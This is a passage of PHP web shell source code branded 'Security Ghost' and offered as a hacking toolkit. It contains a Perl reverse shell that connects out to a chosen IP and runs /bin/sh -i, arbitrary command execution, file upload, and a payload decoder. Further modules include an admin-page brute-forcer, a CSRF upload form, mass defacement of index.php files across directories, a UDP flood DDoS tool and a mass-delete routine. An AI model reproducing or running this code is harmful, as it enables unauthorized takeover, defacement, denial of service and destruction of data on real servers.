  735. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  736. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  737. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  738. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  739. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  740. break;case 'urlencode' : $codi=rawurldecode($text);
  741. break;case 'hexencode' : $codi=quoted_printable_decode($text);
  742. break;case 'ur' : $codi=convert_uudecode($text);
  743. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  744. break;default:break;}}
  745. $html = htmlentities(stripslashes($codi));
  746. echo "<from><center><h3><font size=4 face=chiller color=aqua>Security Ghost</h3></center><textarea cols=70 rows=20 style='onfocus();font-weight:bold;color:red;background-image: transparent;opacity:0.40;background-size:100%;background-repeat: no-repeat;' class='inputz' readonly>".$html."</textarea><BR/><BR/></center></from>";
  747. ?>
  748. <footer style="text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000; position:fixed; left:1px; right:0px; top:0px; border-bottom: 1px solid red ;">
  749. <center><b><font face="Quicksand" color="black" size="3" style="text-shadow: 0 0 5px #2f2b2b, 0 0 10px #2f2b2b, 0 0 20px #2f2b2b, 0 0 45px #2f2b2b, 0 0 40px #2f2b2b;">
  750. <font face="Agency FB" color="red" size="4" style="text-shadow: 0 0 6px black, 0 0 5px black, 0 0 5px black;"></footer>
  751. <?php
  752.     } elseif($_GET['do'] == 'shellscanner') {
  753. ?>
  754. <script language="JavaScript" type="text/JavaScript">
  755. <!--
  756. function MM_openBrWindow(theURL,winName,features) { //v2.0
  757.   window.open(theURL,winName,features)
  758. }
  759. //-->
  760. </script>
  761. <style type="text/css">
  762. <!--
  763. .single{
  764.    border: 1px solid #00ff00;box-shadow: 0px 0px 15px #55FF55;
  765.    padding: 5px;
  766. }
  767. .me  {
  768.    font-size:11px; font-family:Tahoma,Verdana,Arial; color:#ccff99;
  769.    border: 0px;
  770.    padding: 5px;
  771. }
  772.  
  773. .isi{
  774.    padding: 2px;
  775.    border:1px solid #666666;
  776.    font-family: Tahoma;
  777.    color: #ccff99;
  778.    background-color: #666666;
  779.    font-size: 10px;
  780.    font-weight: bold;
  781. }
  782. -->
  783. </style>
  784. <style type="text/css">
  785. #patch {position:absolute; height:1; width:1px; top:0; left:0;}
  786. </style>
  787. </head>
  788. <body>
  789. <center>
  790. <img src="http://i1159.photobucket.com/albums/p622/dvildance/aSSD_zps055e1ce7.gif">
  791. <center><font color="#339900" size="14" face="arial">Backdoor Scanner</font></center><br>
  792. <?php
  793. if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
  794.    if(isset($_POST['yes'])){
  795.       $filename = $_GET['file'];
  796.       echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
  797.       unlink($filename);
  798.       echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
  799.    }else{
  800.       if($_POST['update']) {
  801.          $filename = $_POST['file'];
  802.          if(is_writable($filename)) {
  803.             $handle = fopen($filename, "w+");
  804.             $isi=$_POST['content'];
  805.             fwrite($handle, stripslashes($isi));
  806.             fclose($handle);
  807.             $stat= "<center><strong>edited successfully<br>";
  808.          } else {
  809.             $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
  810.          }
  811.       }
  812.       if($_POST['close']) {
  813.          echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
  814.       }
  815.       $filename = $_GET['file'];
  816.       if (file_exists($filename)){
  817.          $vuln = $_GET['bug'];
  818.          $handle = fopen($filename, "r");
  819.          $contents = fread($handle, filesize($filename));
  820.       ?>
  821.       <center>
  822.       <table>
  823.          <tr><td align="left" class="me"><strong><?=$filename?>&nbsp;&nbsp;>> Contains :&nbsp;<?=$vuln?></strong></td></tr>
  824.          <tr><td class="me">
  825.             <form method="post" action="">
  826.             <input type="hidden" name="file" value="<?=$filename?>">
  827.             <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea><br>
  828.          </td></tr>
  829.          <tr><td align="center" class="me">
  830.          <?php
  831.          if($_POST['delete']) {
  832.             echo "Are you sure to delete ".$filename." ?";
  833.          ?>
  834.          <tr><td align="center" class="me">
  835.             <input type="submit" name="yes" value=" Y E S ">
  836.             <input type="submit" name="no" value=" N O ">
  837.          </td></tr>
  838.          <?php
  839.          }else{
  840.          echo $stat;
  841.          ?>
  842.          </td></tr>
  843.          <tr><td align="right" class="me">
  844.             <input type="submit" name="close" value=" C l o s e ">
  845.             <input type="submit" name="delete" value=" D e l e t e ">
  846.             <input type="submit" name="update" value=" S a v e ">
  847.          </td></tr>
  848.          <?php
  849.          }
  850.          fclose($handle);
  851.          ?>
  852.       </table>
  853. </form>
  854. <?php
  855. }else{
  856. echo "<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
  857. echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
  858. }
  859. ?>
  860. </center>
  861. <?php
  862. }
  863. }elseif(isset($_POST['Submit'])){
  864.    $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  865.    foreach($ceks as $ceker){
  866.       if($_POST[$ceker]<>""){
  867.          $six.=$_POST[$ceker].".";
  868.       }
  869.    }
  870.    
  871. $cek = explode('.', $six);
  872.  
  873. function ListFiles($dir) {
  874.     if($dh = opendir($dir)) {
  875.  
  876.         $files = Array();
  877.         $inner_files = Array();
  878.  
  879.         while($file = readdir($dh)) {
  880.             if($file != "." && $file != "..") {
  881.                 if(is_dir($dir . "/" . $file)) {
  882.                     $inner_files = ListFiles($dir . "/" . $file);
  883.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  884.                 } else {
  885.                     array_push($files, $dir . "/" . $file);
  886.                 }
  887.             }
  888.         }
  889.  
  890.         closedir($dh);
  891.         return $files;
  892.     }
  893. }
  894.    ?>
  895.    <center>
  896.    <table border="0" width="90%" cellpadding="5">
  897.       <tr>
  898.          <td align="right" width="30"><b>No</b></td>
  899.          <td align="center" width="105"><b> T y p e </b></td>
  900.          <td align="center"><b> F i l e&nbsp;&nbsp;L o c a t i o n </b></td>
  901.          <td align="center" width="150"><b> L a s t&nbsp;&nbsp;E d i t </b></td>
  902.          <td  align="right" width="80"><b>F i l e&nbsp;&nbsp;S i z e</b></td>
  903.       </tr><br>
  904. <?php
  905. $target=$_SERVER['DOCUMENT_ROOT'];
  906.    foreach (ListFiles($target) as $key=>$file){
  907.       $nFile = substr($file, -4, 4);
  908.       if($nFile == ".php"){
  909.          if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
  910.          }else{
  911.             $ops = @file_get_contents($file);
  912.             $op=strtolower($ops);
  913.             $arr = array('c99_buff_prepare' => 'c 9 9',
  914.                       'abcr57' => 'r 5 7');
  915.             $sis=0;
  916.             if($op)
  917.             $size=filesize($file);
  918.  
  919.             $last=date("M-d-Y H:i", $last_modified);
  920.             foreach($arr as $key => $val) {
  921.                if(@preg_match("/$key/", $op)) {
  922.                   $sis=1;
  923.                   $i++;
  924.                   ?>
  925.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  926.                      <td align="right"><font color="red"><blink><?=$i?></blink></font></td>
  927.                      <td align="center"><font color="red"><blink><?=$val?></blink></font></td>
  928.                      <td align="left"><blink>
  929.                      <a href="#" class="abunai" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  930.                      </blink></td>
  931.                      <td align="center"><font color="red"><blink><?=$last?> GMT+9</blink></font></td>
  932.                      <td align="right"><font color="red"><blink><?=$size?> byte</blink></font></td>
  933.                      <script language="javascript">
  934.                         var bgcolor = "transparent";
  935.                         var change_color = "#444444"
  936.                         function mover(aa) {
  937.                            aa.style.backgroundColor = change_color;
  938.                         }
  939.                         function mout(aa) {
  940.                            aa.style.backgroundColor = bgcolor;
  941.                         }
  942.                      </script>
  943.                   </tr>
  944.                   <?php
  945.                }
  946.             }
  947.             if($sis<>"1"){
  948.                if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
  949.                   $sis="2";
  950.                   $i++;
  951.                   $val="hidden shell";
  952.                   ?>
  953.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  954.                      <td align="right"><font color="blue"><?=$i?></font></td>
  955.                      <td align="center"><font color="blue"><?=$val?></font></td>
  956.                      <td align="left">
  957.                      <a href="#" class="xxx" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  958.                      </td>
  959.                      <td align="center"><font color="blue"><?=$last?> GMT+9</font></td>
  960.                      <td align="right"><font color="blue"><?=$size?> byte</font></td>
  961.                      <script language="javascript">
  962.                         var bgcolor = "transparent";
  963.                         var change_color = "#444444"
  964.                         function mover(aa) {
  965.                            aa.style.backgroundColor = change_color;
  966.                         }
  967.                         function mout(aa) {
  968.                            aa.style.backgroundColor = bgcolor;
  969.                         }
  970.                      </script>
  971.                   </tr>
  972.                   <?php
  973.                }
  974.             }
  975.             if($sis=="0"){
  976.             foreach($cek as $bugs) {
  977.                 if ($bugs<>""){
  978.                if(@preg_match("/$bugs\((.*?)\)/", $op)) {
  979.                   $i++;
  980.                   ?>
  981.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  982.                      <td align="right"><?=$i?></td>
  983.                      <td align="center"><?=$bugs?></td>
  984.                      <td align="left">
  985.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  986.                      </td>
  987.                      <td align="center"><?=$last?> GMT+9</td>
  988.                      <td align="right"><?=$size?> byte</td>
  989.                      <script language="javascript">
  990.                         var bgcolor = "transparent";
  991.                         var change_color = "#444444"
  992.                         function mover(aa) {
  993.                            aa.style.backgroundColor = change_color;
  994.                         }
  995.                         function mout(aa) {
  996.                            aa.style.backgroundColor = bgcolor;
  997.                         }
  998.                      </script>
  999.                   </tr>
  1000.                   <?php
  1001.                }              
  1002.             }
  1003.             }
  1004.             }
  1005.             if($_POST['textV']<>""){
  1006.                $text=$_POST['textV'];
  1007.                   if(@preg_match("/$text/", $op)) {
  1008.                   $i++;
  1009.                   ?>
  1010.                   <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1011.                      <td align="right"><?=$i?></td>
  1012.                      <td align="center"><?=$text?></td>
  1013.                      <td align="left">
  1014.                      <a href="#" onclick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
  1015.                      </td>
  1016.                      <td align="center"><?=$last?> GMT+9</td>
  1017.                      <td align="right"><?=$size?> byte</td>
  1018.                      <script language="javascript">
  1019.                         var bgcolor = "transparent";
  1020.                         var change_color = "#444444"
  1021.                         function mover(aa) {
  1022.                            aa.style.backgroundColor = change_color;
  1023.                         }
  1024.                         function mout(aa) {
  1025.                            aa.style.backgroundColor = bgcolor;
  1026.                         }
  1027.                      </script>
  1028.                   </tr>
  1029.                   <?php
  1030.                }
  1031.            
  1032.            
  1033.             }
  1034.          }
  1035.       }
  1036.    }
  1037.    if($i==0){
  1038.       foreach($cek as $bugs) {
  1039.          if ($bugs<>""){
  1040.             $x++;
  1041.    ?>
  1042.       <tr style ="background-color: Your background Color;" onmouseover="mover(this)"  onmouseout="mout(this)">
  1043.          <td align="right"><?=$x?></td>
  1044.          <td align="center"><?=$bugs?></td>
  1045.          <td align="center"> not exist </td>
  1046.          <td align="center"> no record </td>
  1047.          <td align="right"> -&nbsp;&nbsp;&nbsp;&nbsp;byte </td>
  1048.       </tr>
  1049.    <?php
  1050.          }
  1051.       }
  1052.    }
  1053.    ?>
  1054.    </table>
  1055.    <?php
  1056. }else{
  1057.    $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
  1058. ?>
  1059.    <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
  1060.    <center>
  1061.    <table class="single" width="400" border="1" -webkit-box-shadow: 0px 0px 15px #55FF55; cellpadding="10">
  1062.    <tr><td class="me"><center>
  1063.      
  1064.       <table class="me" width="200">
  1065.          <tr><td class="me">
  1066.             <script language="javascript">
  1067.                function cekKlik(){  
  1068.                   if (!document.fCheck.cekV.checked)
  1069.                      document.fCheck.textV.disabled=true;  
  1070.                   else
  1071.                      document.fCheck.textV.disabled=false;
  1072.                   if(document.fCheck.cekV.checked){
  1073.                      master = master + 1;
  1074.                   }else{
  1075.                      if(master > 0 ){
  1076.                         master = master - 1;
  1077.                      }else{
  1078.                         master = master;
  1079.                      }
  1080.                   }
  1081.                   if(master != 0){
  1082.                      document.fCheck.Submit.disabled=false;
  1083.                   }else{
  1084.                      document.fCheck.Submit.disabled=true;
  1085.                   }        
  1086.                }    
  1087.             </script>  
  1088.             <?php
  1089.             //dari sini
  1090.             foreach($find as $bug) {
  1091.             ?>
  1092.             <script language="javascript">
  1093.                var master = 0;
  1094.                function checkValue<?=$bug?>(){
  1095.                   if(document.fCheck.<?=$bug?>.checked){
  1096.                      master = master + 1;
  1097.                   }else{
  1098.                      if(master > 0 ){
  1099.                         master = master - 1;
  1100.                      }else{
  1101.                         master = master;
  1102.                      }
  1103.                   }
  1104.                   if(master != 0){
  1105.                      document.fCheck.Submit.disabled=false;
  1106.                   }else{
  1107.                      document.fCheck.Submit.disabled=true;
  1108.                   }  
  1109.                }
  1110.             </script>
  1111.             <input onclick="checkValue<?=$bug?>();" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />&nbsp;<?=$bug?><br>
  1112.             <?php
  1113.             }
  1114.             ?>
  1115.             <input name="cekV" type="checkbox" onClick="cekKlik();" id="cekV" value="cekV">
  1116.             <input class="isi" disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
  1117.             <br><br>
  1118.             <input type="hidden" name="asal" value="abcd">
  1119.             <input disabled="disabled" type="submit" name="Submit" value=" Start " />
  1120.          </td></tr>
  1121.       </table>
  1122.    </td></tr></table>
  1123.    </form>
  1124. <?php
  1125. }
  1126. ?>
  1127. <br><br><hr width="300">
  1128. <?php
  1129.     } elseif($_GET['do'] == 'bconnet') {
  1130.         echo '<div id="login" style="margin-top: 10px; margin-left: 10px;">';
  1131.         echo '<form action="?page=bcon" method="get"><input type="hidden" name="page" value="bcon"/>';
  1132.         echo 'IP:<br><input type="text" name="ip" value="'.getenv("remote_addr").'" style="margin-top: 5px;"/><br><br>';
  1133.         echo 'Port:<input type="submit" value="Connect" style="margin-left: 130px; margin-top: -4px;"/><br><input type="text" name="port" value="666" style="margin-top: 5px;"/>';
  1134.         echo '</form>';
  1135.         echo '</div>';
  1136.         if(isset($_GET['ip']) && isset($_GET['port'])){
  1137.             $ip = $_GET['ip'];
  1138.             $port = $_GET['port'];
  1139.             $bc = fopen("/tmp/bxcon.pl","w");
  1140.             fwrite($bc,'#!/usr/bin/perl
  1141. use Socket;
  1142. $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n");
  1143. $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n");
  1144. $proto=getprotobyname("tcp");
  1145. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  1146. connect(SOCKET, $paddr) || die("Error: $!\n");
  1147. open(STDIN, ">&SOCKET");
  1148. open(STDOUT, ">&SOCKET");
  1149. open(STDERR, ">&SOCKET");
  1150. system("/bin/sh -i");
  1151. close(STDIN);
  1152. close(STDOUT);
  1153. close(STDERR);');
  1154.             fclose($bc);
  1155.             shell_exec("perl /tmp/bxcon.pl");
  1156.             unlink("/tmp/bxcon.pl");
  1157.         }
  1158.     break;
  1159.  
  1160.  
  1161.  
  1162. echo '</td>
  1163. </tr>
  1164. </table>
  1165. <br><center>xB1N4RYx ~ 2012</center><br>
  1166. </body>
  1167. </html>';
  1168. function rooting()
  1169. {
  1170. echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';
  1171. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1172. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1173. if( $_POST['_upl'] == "Upload" ) {
  1174.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yuklendi</b><br><br>'; }
  1175.     else { echo '<b>Basarisiz</b><br><br>'; }
  1176. }
  1177. }
  1178. $x = $_GET["x"];
  1179. Switch($x){
  1180. case "rooting";
  1181.     rooting();
  1182.     break;
  1183.    
  1184.     }
  1185.         } elseif($_GET['do'] == 'about') {
  1186. ?>
  1187. <br>
  1188.     <embed src="http://www.youtube.com/v/rr8Rx1Y2-WA&amp;autoplay=1&amp;loop=1&amp;playlist=besNDPvEwQw" type="application/x-shockwave-flash" wmode="transparent" height="1"width="1"></embed>
  1189.     <div class="terimakasih">
  1190. <tr><td><center><font color="gold">No body can give you freedom and nobody can give you equality.
  1191.     <br>Jiwa Seorang defacer tetaplah sama :D
  1192.     <br><font color="white"> 12-20-2016 - TanjungPinang</font></font> <br>Create By ./XvC404<br>Thanks To: MY Friends, And ALL Security Ghost.<br>Special Greats To My Keyboard.
  1193. </td></tr>
  1194.  
  1195.  
  1196.     <?php
  1197. } elseif($_GET['do'] == 'csrf') {
  1198. ?>      <html>
  1199. <title>CSRF EXPLOITER ONLINE</title>
  1200. <center><br><br><br><br>
  1201. <font color=red>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  1202. <center>
  1203. <form method="post">
  1204. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1205. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1206. <input type="submit" name="d" value="Lock!">
  1207. </form>
  1208. <?php
  1209. //gak penting
  1210.      @$url = $_POST['url'];
  1211.      @$pf = $_POST['pf'];
  1212.      @$d = $_POST['d'];
  1213. if($d) {
  1214.     //baccod
  1215.    
  1216.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  1217. }
  1218. ?>
  1219. </form>
  1220. </html>
  1221. <?php
  1222.  
  1223. } elseif($_GET['do'] == 'admf') {
  1224.     ?>
  1225. <type='text/javascript'/></script>
  1226. <style>
  1227. </style>
  1228.  
  1229. </head>
  1230. <link rel="SHORTCUT ICON"  href="http://i.imgur.com/2Koa43H.png">
  1231. </style>
  1232. <br>
  1233. <br>
  1234. <br>
  1235. <td width=100% id=Gretz>
  1236. <form action="" method="post">
  1237. <center><p class="frontboxtext"><input name="hash_lol" class="textbox" type="text" size="30" value="http://www.target.co.il/"/>
  1238. <input name="submit_lol" class="textbox" value="Submit Site" type="submit">
  1239. </form>
  1240. <?php
  1241. set_time_limit(0);
  1242.  
  1243. if (isset($_POST["submit_lol"])) {
  1244. $url = $_POST['hash_lol'];
  1245. echo "<br />Crot ".$url."<br /><br />";
  1246.  
  1247. $adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/",  "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel");
  1248.  
  1249. foreach ($adminlocales as $admin){
  1250. $headers = get_headers("$url$admin");
  1251. if (eregi('200', $headers[0])) {
  1252.     echo "<a href='$url/$admin'>$url$admin</a> Nemu nih!<br />";
  1253. }
  1254. else {
  1255.     echo "$url$admin Gk ketemu!<br />";
  1256. }
  1257. }
  1258. }  
  1259. } elseif($_GET['do'] == 'cmd') {
  1260.     echo "<form method='post'>
  1261.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  1262.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1263.     </form>";
  1264.     if($_POST['do_cmd']) {
  1265.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  1266.     }
  1267. } elseif($_GET['do'] == 'mass_deface') {
  1268.     function sabun_massal($dir,$namafile,$isi_script) {
  1269.         if(is_writable($dir)) {
  1270.             $dira = scandir($dir);
  1271.             foreach($dira as $dirb) {
  1272.                 $dirc = "$dir/$dirb";
  1273.                 $lokasi = $dirc.'/'.$namafile;
  1274.                 if($dirb === '.') {
  1275.                     file_put_contents($lokasi, $isi_script);
  1276.                 } elseif($dirb === '..') {
  1277.                     file_put_contents($lokasi, $isi_script);
  1278.                 } else {
  1279.                     if(is_dir($dirc)) {
  1280.                         if(is_writable($dirc)) {
  1281.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1282.                             file_put_contents($lokasi, $isi_script);
  1283.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1284.                         }
  1285.                     }
  1286.                 }
  1287.             }
  1288.         }
  1289.     }
  1290.     function sabun_biasa($dir,$namafile,$isi_script) {
  1291.         if(is_writable($dir)) {
  1292.             $dira = scandir($dir);
  1293.             foreach($dira as $dirb) {
  1294.                 $dirc = "$dir/$dirb";
  1295.                 $lokasi = $dirc.'/'.$namafile;
  1296.                 if($dirb === '.') {
  1297.                     file_put_contents($lokasi, $isi_script);
  1298.                 } elseif($dirb === '..') {
  1299.                     file_put_contents($lokasi, $isi_script);
  1300.                 } else {
  1301.                     if(is_dir($dirc)) {
  1302.                         if(is_writable($dirc)) {
  1303.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  1304.                             file_put_contents($lokasi, $isi_script);
  1305.                         }
  1306.                     }
  1307.                 }
  1308.             }
  1309.         }
  1310.     }
  1311.     if($_POST['start']) {
  1312.         if($_POST['tipe_sabun'] == 'mahal') {
  1313.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1314.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1315.             echo "</div>";
  1316.         } elseif($_POST['tipe_sabun'] == 'murah') {
  1317.             echo "<div style='margin: 5px auto; padding: 5px'>";
  1318.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1319.             echo "</div>";
  1320.         }
  1321.     } else {
  1322.     echo "<center>";
  1323.     echo "<form method='post'>
  1324.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  1325.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  1326.     <font style='text-decoration: underline;'>Folder:</font><br>
  1327.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1328.     <font style='text-decoration: underline;'>Filename:</font><br>
  1329.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1330.     <font style='text-decoration: underline;'>Index File:</font><br>
  1331.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Security Ghost</textarea><br>
  1332.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1333.     </form></center>";
  1334.     }
  1335. } elseif($_GET['do'] == 'ddos') {
  1336. ?>
  1337. <html>
  1338. <form action=" " method="post">
  1339. <center><br><br><br>
  1340. Your IP: <font color="white"><b><?php echo $my_ip; ?></b></font>&nbsp;(Don't DoS yourself nub)<br><br>
  1341. <table class="tabnet" style="width:333px;padding:0 1px;">
  1342. <th colspan="5">Ddos Tool</th>
  1343. <tr><tr><td>IP Target</td><td>:</td>
  1344. <td><input type="text" class="inputz" name="ip" size="48" maxlength="25"  value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';"/>
  1345. </td></tr>
  1346. <tr><td>Time</td><td>:</td>
  1347. <td><input type="text" class="inputz" name="time" size="48" maxlength="25"  value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';"/>
  1348. </td></tr>
  1349.  
  1350. <tr><td>Port</td><td>:</td>
  1351. <td><input type="text" class="inputz" name="port" size="48" maxlength="5"  value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';"/>
  1352. </td></tr></tr></table></b><br>
  1353. <input type="submit" class="inputzbut" name="fire" value="  Firee !!!   ">
  1354. <br><br>
  1355. <center>
  1356. <font color="white">Seteleh selesai menggunakan tools ini segera refresh browsingmu
  1357. </center>
  1358. </form>
  1359. </center>
  1360. <?php
  1361.     @$submit = $_POST['fire'];
  1362.     if (isset($submit)) {
  1363.         $packets = 0;
  1364.         $ip = $_POST['ip'];
  1365.         $rand = $_POST['port'];
  1366.         set_time_limit(0);
  1367.         ignore_user_abort(FALSE);
  1368.         $exec_time = $_POST['time'];
  1369.         $time = time();
  1370.         print "Flooded: $ip on port $rand <br><br>";
  1371.         $max_time = $time + $exec_time;
  1372.         for ($i = 0;$i < 65535;$i++) {
  1373.             $out.= "X";
  1374.         }
  1375.         while (1) {
  1376.             $packets++;
  1377.             if (time() > $max_time) {
  1378.                 break;
  1379.             }
  1380.             $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  1381.             if ($fp) {
  1382.                 fwrite($fp, $out);
  1383.                 fclose($fp);
  1384.             }
  1385.         }
  1386.         echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
  1387. ";
  1388.     }  
  1389. } elseif($_GET['do'] == 'mass_delete') {
  1390.     function hapus_massal($dir,$namafile) {
  1391.         if(is_writable($dir)) {
  1392.             $dira = scandir($dir);
  1393.             foreach($dira as $dirb) {
  1394.                 $dirc = "$dir/$dirb";
